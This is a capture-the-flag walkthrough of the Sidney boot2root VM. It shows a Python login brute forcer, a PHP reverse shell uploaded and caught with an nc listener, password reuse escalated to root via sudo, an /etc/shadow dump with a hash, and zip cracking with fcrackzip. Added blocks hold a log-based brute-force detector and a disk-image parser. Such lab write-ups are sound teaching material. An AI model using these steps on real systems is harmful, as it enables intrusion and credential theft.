Description:
Welcome to my third boot2root / CTF, this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it's never where they normally live... B-)
If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56
Some hints for you:
- If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502
- The flag is audio as well as visual
Many thanks to Rasta_Mouse and GKNSB for testing this CTF.
Special thanks and shout-outs go to GKNSB and Rasta_Mouse, hopefully he streams this one live too! Also a shout-out to g0tmi1k for #vulnhub and offering to host my third CTF.
Here We Go:
1. Host Discovery
2. Service Enumeration
Host Discovery:
Discovery of the IP: netdiscover -r 192.168.234.0/24
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP               At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.234.1    00:50:56:c0:00:01      1      60  VMware, Inc.
 192.168.234.167  00:0c:29:5d:88:b2      1      60  VMware, Inc.
 192.168.234.254  00:50:56:e1:ab:9c      1      60  VMware, Inc.
Our target is 192.168.234.167
Service Enumeration:
Now that we have our target (192.168.234.167) we can use nmap to discover any running services.
NOTE: nmap could also have been used to discover the host, but I like using netdiscover purely to speed up the process.
root@kali:~# nmap -sS -Pn -p1-65535 192.168.234.167

Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-06 14:14 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.234.167
Host is up (0.000068s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:5D:88:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
Nikto to the rescue:
Using nikto.... nikto -host 192.168.234.167
root@kali:~# nikto -host 192.168.234.167
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.234.167
+ Target Hostname:    192.168.234.167
+ Target Port:        80
+ Start Time:         2016-06-06 14:22:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x116 0x5339ba83ee199
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2016-06-06 14:22:13 (GMT-4) (9 seconds)
Personally I always run dirb with the defaults. When needed I will run dirbuster with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
After running dirb against 192.168.234.167:
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jun  6 14:27:52 2016
URL_BASE: http://192.168.234.167/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

---- Scanning URL: http://192.168.234.167/ ----
+ http://192.168.234.167/index (CODE:200|SIZE:278)
+ http://192.168.234.167/index.html (CODE:200|SIZE:278)
+ http://192.168.234.167/server-status (CODE:403|SIZE:303)

-----------------
END_TIME: Mon Jun  6 14:27:54 2016
DOWNLOADED: 4612 - FOUND: 3
Viewing the source we are presented with the following:
<TITLE>38911 Bytes Free</TITLE>
<BODY>
So.... Back for more are you....? Give Ben Daglish a call. I'm sure
he's know the login B-)
<br></br>
<B>Commodore 64 Still ready</B>
<br></br>
<img src="commodore64/c64_1280x1024.jpg" alt="commodore64" height="1024" width="1280">
</BODY>
Browsing to the commodore64/ directory referenced by that image gives no directory listing; instead we are greeted by a Commodore 64 gif and a message. The source tells us:
<title>Shoo!</title>
<!-- added by robhubbard password is the C=64 sound chip lowercase -->
<!-- 3letters4digits no space... Instead, show user a proper micro -->
<BODY>
Will you go away, I'm trying to press play on tape and you bother me kid!
<br></br>
<img src="200.gif" alt="commodore64" height="408" width="544">
</BODY>
We have a second name, "robhubbard", and a clue as to the password:
"password is the C=64 sound chip lowercase...3letters4digits no space..."
Geez... might as well just write out the password... or so I thought. I went off and used Wikipedia (based on the search results for "c=64 sound chip") and, long story short, found chips with the prefixes sid and mos.
Which is great and all, but where the hell is a login screen? Before using dirbuster on the commodore64 folder I decided to try to figure out what I was dealing with. Requesting index.php displays...
A login screen. WTF were we looking at before? Requesting just index without a suffix returns us to the Commodore 64 gif (MultiViews, as nikto noted, serves index.html for it)... hmm.
Anyhow, PHPFM... what the hell is that? After a quick search we can see that PHPFM is a PHP-based file manager (uploading a PHP reverse shell is looking pretty promising).
Using sqlmap -u "http://192.168.234.167/commodore64/index.php" --forms yielded no results. Damn.
OK, so what we know already from discovery is that Ben Daglish knows the login, and there is an assumed user "robhubbard" who seems very willing to give up a password.
Time to make a brute forcer using Python:
import requests

url = 'http://192.168.234.167/commodore64/index.php'
user = 'robhubbard'
lastLen = 0  # length of the previous response; a change means a different page came back

# Clue from the source: "mos" + 4 digits, no space, so try 0..9999
for i in range(0, 10000):
    passwd = 'mos{}'.format(i)
    # PHPFM's login form is multipart, hence files= with (None, value) tuples
    resp = requests.post(url, files={'input_username': (None, user),
                                     'input_password': (None, passwd),
                                     'path': (None, '')})
    if lastLen != len(resp.text):
        print(len(resp.text))
        print("Using {} resulted in a different page size".format(passwd))
        lastLen = len(resp.text)
Running python Bruter.py:
1841
Using mos3935 resulted in a different page size
18438
Using mos6518 resulted in a different page size
1841
Using mos6519 resulted in a different page size
1840
NOTE: Using the brute forcer too much caused the Sidney VM (at least on my machine) to have some funky errors (the session was not stored properly upon logging in and I had to reset the VM to get it to function correctly again).
Judging by the output, the page length jumped from 1840/1841 to 18438, so I think we got a hit on:
username: robhubbard
password: mos6518
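As an added defensive counterpart to the brute forcer above (example code, not from the write-up): the same page-size signal that reveals the hit also stands out in the web server's access log. The script below parses Apache combined-format lines, flags any client that POSTs to the login path more than a threshold number of times inside a time window, and notes whether a response much larger than the usual failure page followed. The log lines are constructed; the path /commodore64/index.php and the sizes 1841/18438 are taken from the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: ip ident user [ts] "method path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def detect_bruteforce(lines, login_path, threshold=20, window=timedelta(minutes=5), success_ratio=3.0):
    """Return [(ip, peak_posts_in_window, probably_succeeded)] for every client that
    sent at least `threshold` POSTs to login_path inside any `window`-long span.
    A response more than success_ratio times the typical (median) size is taken
    as a successful login: the same page-size signal the brute forcer keys on."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append((rec["ts"], rec["size"]))
    alerts = []
    for ip, events in sorted(posts.items()):
        events.sort()
        start, peak = 0, 0
        for end, (ts, _) in enumerate(events):            # sliding window over timestamps
            while ts - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        sizes = sorted(size for _, size in events)
        typical = sizes[len(sizes) // 2]                  # median = the failure page
        alerts.append((ip, peak, sizes[-1] > success_ratio * typical))
    return alerts


def sample_log(failures=30):
    """Constructed log lines (not captured from the VM): one benign GET, then
    `failures` failed POSTs of 1841 bytes and one 18438-byte success, 1 s apart."""
    t0 = datetime(2016, 6, 6, 14, 40, 0, tzinfo=timezone(timedelta(hours=-4)))
    fmt = '%s - - [%s] "%s %s HTTP/1.1" 200 %d "-" "%s"'

    def stamp(i):
        return (t0 + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = [fmt % ("192.168.234.1", stamp(0), "GET", "/index.html", 278, "Mozilla/5.0")]
    for i in range(failures):
        lines.append(fmt % ("192.168.234.2", stamp(i + 1), "POST", "/commodore64/index.php", 1841, "python-requests/2.9.1"))
    lines.append(fmt % ("192.168.234.2", stamp(failures + 1), "POST", "/commodore64/index.php", 18438, "python-requests/2.9.1"))
    return lines
```

Run against a real access.log with `detect_bruteforce(open("access.log"), "/commodore64/index.php")`; the threshold and window are tuning knobs, not fixed values.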
Trying robhubbard/mos6518 we are authenticated to the PHPFM site.
Ooooo... "Upload Files" looks pretty sweet.
Time to use a PHP reverse shell that I found on pentestmonkey.net.
The reverse shell uploaded without an issue. I figured the site would have fought me a little more but, hey, that's probably why I've never heard of PHPFM, lol.
Anyhow, firing up a netcat listener on port 666 (nc -lvp 666) and visiting the revshell.php that I uploaded, I get a reverse shell. w00t!
connect to [192.168.234.2] from (UNKNOWN) [192.168.234.167] 43464
Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
rhubbard:x:1000:1000:Rob Hubbard,,,:/home/rhubbard:/bin/bash
/bin/sh: 0: can't access tty; job control turned off
$
NOTE: I modified the payload slightly so that it runs id, whoami and cat /etc/passwd upon connection.
The output of cat /etc/passwd shows us that the two real users on the system are root and rhubbard... wait, as in robhubbard? I wonder if the doofus is using the same password. Before we can attempt an su (attempting su robhubbard at this stage gives a "su: must be run from a terminal" error) we need a proper TTY, which is easy enough: we will use the shell-upgrade trick from g0tmi1k's blog, python -c "import pty;pty.spawn('/bin/bash');"
Using python -c "import pty;pty.spawn('/bin/bash');" results in a "/bin/sh: 2: python: not found" error. Python is missing... hrmmm. I decided to go looking to see what's up with python.
$ find / -name python* 2>/dev/null
...
/usr/bin/python3.5m
/usr/bin/python3.5
/usr/bin/python3
/usr/bin/python3m
$ python3.5 -c "import pty;pty.spawn('/bin/bash');"
www-data@sidney:/$ _
OK... now let's see if numbnuts uses the same password. Using su rhubbard with mos6518 as the password, we successfully switch users to rhubbard.
Can we get lucky with sudo? sudo -l results in the following:
rhubbard@sidney:/$ sudo -l
sudo -l
[sudo] password for rhubbard: mos6518
Matching Defaults entries for rhubbard on sidney.example.com:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rhubbard may run the following commands on sidney.example.com:
    (ALL : ALL) ALL
rhubbard@sidney:/$
rhubbard has permission to run anything and everything as root. Let's get our root shell using sudo su:
root@sidney:/# id;cat /etc/shadow
id;cat /etc/shadow
uid=0(root) gid=0(root) groups=0(root)
root:!:16944:0:99999:7:::
daemon:*:16911:0:99999:7:::
bin:*:16911:0:99999:7:::
sys:*:16911:0:99999:7:::
sync:*:16911:0:99999:7:::
games:*:16911:0:99999:7:::
man:*:16911:0:99999:7:::
lp:*:16911:0:99999:7:::
mail:*:16911:0:99999:7:::
news:*:16911:0:99999:7:::
uucp:*:16911:0:99999:7:::
proxy:*:16911:0:99999:7:::
www-data:*:16911:0:99999:7:::
backup:*:16911:0:99999:7:::
list:*:16911:0:99999:7:::
irc:*:16911:0:99999:7:::
gnats:*:16911:0:99999:7:::
nobody:*:16911:0:99999:7:::
systemd-timesync:*:16911:0:99999:7:::
systemd-network:*:16911:0:99999:7:::
systemd-resolve:*:16911:0:99999:7:::
systemd-bus-proxy:*:16911:0:99999:7:::
syslog:*:16911:0:99999:7:::
_apt:*:16911:0:99999:7:::
lxd:*:16944:0:99999:7:::
mysql:!:16944:0:99999:7:::
messagebus:*:16944:0:99999:7:::
uuidd:*:16944:0:99999:7:::
dnsmasq:*:16944:0:99999:7:::
rhubbard:$6$YWG61JCB$EPy1p59NOkASVPJAVXN20wSjtJdDVLeNue3eE5Tl0ANtBqJPqXLyOIh73NXhb8IIfqHYB9t48Q2MVw/Vs6VN90:16944:0:99999:7:::
root@sidney:/#
Let's get our flag.
root@sidney:~# ls -lah
ls -lah
total 88K
drwx------  3 root     root     4.0K Jun  6 16:24 .
drwxr-xr-x 23 root     root     4.0K May 31 20:39 ..
-rw-------  1 root     root      584 Jun  6 16:24 .bash_history
-rw-r--r--  1 root     root     3.1K Oct 22  2015 .bashrc
dr--------  3 root     root     4.0K May 24 21:02 .commodore64
-rw-rw-r--  1 rhubbard rhubbard  61K May 24 21:27 hint.gif
-rw-r--r--  1 root     root      148 Aug 17  2015 .profile
As you can see we are presented with a hint.gif and a hidden folder called .commodore64. I will skip the hint for now and traverse the .commodore64 path.
root@sidney:~/.commodore64# ls -lah
ls -lah
total 12K
dr-------- 3 root root 4.0K May 24 21:02 .
drwx------ 3 root root 4.0K Jun  6 16:24 ..
dr-------- 3 root root 4.0K May 24 21:01 .miami
root@sidney:~/.commodore64# cd .miami
cd .miami
root@sidney:~/.commodore64/.miami# ls
ls
vice
root@sidney:~/.commodore64/.miami# ls -lah
ls -lah
total 12K
dr-------- 3 root root 4.0K May 24 21:01 .
dr-------- 3 root root 4.0K May 24 21:02 ..
dr-------- 2 root root 4.0K May 25 18:40 vice
root@sidney:~/.commodore64/.miami# cd vice
cd vice
root@sidney:~/.commodore64/.miami/vice# ls -lah
ls -lah
total 12K
dr-------- 2 root     root     4.0K May 25 18:40 .
dr-------- 3 root     root     4.0K May 24 21:01 ..
-r-------- 1 rhubbard rhubbard 4.0K May 24 20:59 flag.zip
-r-------- 1 root     root        0 May 24 21:02 versatile_commodore_emulator
root@sidney:~/.commodore64/.miami/vice#
Using cp I was able to copy flag.zip to /var/www/html and fetch the zip file to my local machine. Of course it is password protected, so using fcrackzip we get the following output:
root@kali:~/Downloads# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -uv flag.zip
found file 'flag.d64', (size cp/uc 3923/174848, flags 9, chk 9be5)
checking pw budayday
PASSWORD FOUND!!!!: pw == 38911
Sweet, so we have a flag.d64 now, which can be run with an emulator.
NOTE: I am lazy at the moment so I will not attempt to get the emulator working, but running strings on the file tells me everything I need to know.
``````````````````````````````````````
``````````````````````````````````
}CONGRATULATIONS! }
}
``````````````````````````````````
``````````````````````````````````````
TI
(60
0: G
TI
+r.81&4B7
\pbLh
%%%%%%%%%%%%%%%%%%%%%%%%)##
%%%%%%%%#)#
}
}WELL DONE ONCE MORE ON GETTING THE}
}FLAG --VULNHUB'S FIRST C=64 ONE-- }
}WHICH I HOPE YOU ENJOYED. }
} }
}SHOUT-OUTS TO #VULNHUB & A S
} }
} }
}iuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiu}
}jkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjkjk}
} }
PSID
Warhawk
Rob Hubbard
1986 Firebird
H)xJJJ
JJJJ
OP0
*,=GQ[oz
%%%%%%%%%%%%%%%%##)
%%%%%%
&&&&&&
''''''
,,,,,
-----
.....
7?C?O
PECIAL}
}THANKS GOES TO GKNSB & RASTA
MOUSE}
}FOR TESTING & G0TMI1K FOR HOSTING.}
} }
}COMMODORE 64 - STILL READY }
} --KNIGHTMA
VULNHUB
01 2A
FLAG
WARHAWK.SID
qqqqqqqqqqqqqqqq
q q
qqqqqqqqqqqqqqqq
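Rather than scraping the image with strings, a .d64 can be read properly: it is a raw dump of a 1541 disk (35 tracks, 683 sectors of 256 bytes, which is exactly the 174848 bytes fcrackzip reported), with the BAM and disk name at track 18 sector 0 and the directory chain starting at track 18 sector 1. The lister below is an added example, not code from the write-up or the VM; the image it parses is constructed in memory with the disk name and file names that the strings output shows, since the real flag.d64 is not on this page.

```python
import struct

# Tracks 1-35 of a 1541 disk, sectors per track in the four speed zones: 21/19/18/17.
SECTORS_PER_TRACK = [21] * 17 + [19] * 7 + [18] * 6 + [17] * 5
D64_SIZE = 256 * sum(SECTORS_PER_TRACK)          # 683 sectors = 174848 bytes
FILE_TYPES = {0: "DEL", 1: "SEQ", 2: "PRG", 3: "USR", 4: "REL"}

def sector_offset(track, sector):
    """Byte offset of (track, sector); tracks are 1-based, sectors 0-based."""
    if not 1 <= track <= 35 or not 0 <= sector < SECTORS_PER_TRACK[track - 1]:
        raise ValueError("bad track/sector %d/%d" % (track, sector))
    return 256 * (sum(SECTORS_PER_TRACK[:track - 1]) + sector)

def petscii_name(raw):
    """Strip the 0xA0 padding from a PETSCII name; upper-case letters map straight to ASCII."""
    return bytes(b for b in raw if b != 0xA0).decode("latin-1")

def list_d64(image):
    """Return (disk name, disk id, [(file name, type, blocks)]) for a .d64 image."""
    if len(image) != D64_SIZE:
        raise ValueError("not a 35-track d64 image: %d bytes" % len(image))
    bam = image[sector_offset(18, 0):sector_offset(18, 0) + 256]   # track 18, sector 0
    disk_name = petscii_name(bam[0x90:0xA0])
    disk_id = bam[0xA2:0xA4].decode("latin-1")
    track, sector, entries, seen = bam[0], bam[1], [], set()
    while track != 0 and (track, sector) not in seen:   # walk the directory chain
        seen.add((track, sector))                         # guard against a looping chain
        off = sector_offset(track, sector)
        block = image[off:off + 256]
        for i in range(8):                                # eight 32-byte entries per sector
            entry = block[32 * i:32 * i + 32]
            ftype = entry[2]
            if ftype == 0:                                # empty or scratched slot
                continue
            blocks = struct.unpack_from("<H", entry, 0x1E)[0]
            entries.append((petscii_name(entry[5:21]), FILE_TYPES.get(ftype & 0x07, "?"), blocks))
        track, sector = block[0], block[1]                # next directory sector (track 0 = end)
    return disk_name, disk_id, entries

def build_sample_image():
    """Constructed image, not the real flag.d64: disk VULNHUB / id 01 with a PRG and a SEQ file."""
    img = bytearray(D64_SIZE)
    bam = bytearray(256)
    bam[0], bam[1], bam[2] = 18, 1, 0x41                  # first dir sector, DOS version 'A'
    bam[0x90:0xA0] = b"VULNHUB".ljust(16, b"\xa0")
    bam[0xA2:0xA4], bam[0xA5:0xA7] = b"01", b"2A"
    img[sector_offset(18, 0):sector_offset(18, 0) + 256] = bam
    d = bytearray(256)
    d[0], d[1] = 0, 0xFF                                  # no further directory sectors
    files = [(b"FLAG", 0x82, 17, 0, 3), (b"WARHAWK.SID", 0x81, 1, 0, 12)]
    for i, (name, ftype, tr, se, blocks) in enumerate(files):
        e = 32 * i
        d[e + 2], d[e + 3], d[e + 4] = ftype, tr, se      # type, first data track/sector
        d[e + 5:e + 21] = name.ljust(16, b"\xa0")
        struct.pack_into("<H", d, e + 0x1E, blocks)
    img[sector_offset(18, 1):sector_offset(18, 1) + 256] = d
    return bytes(img)
```

For the real image, `list_d64(open("flag.d64", "rb").read())` gives the directory, and the first track/sector in each entry is where to start following the data chain to extract a file.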
Awesome VM from @knightmare2600 and a special thanks to VulnHub for hosting it.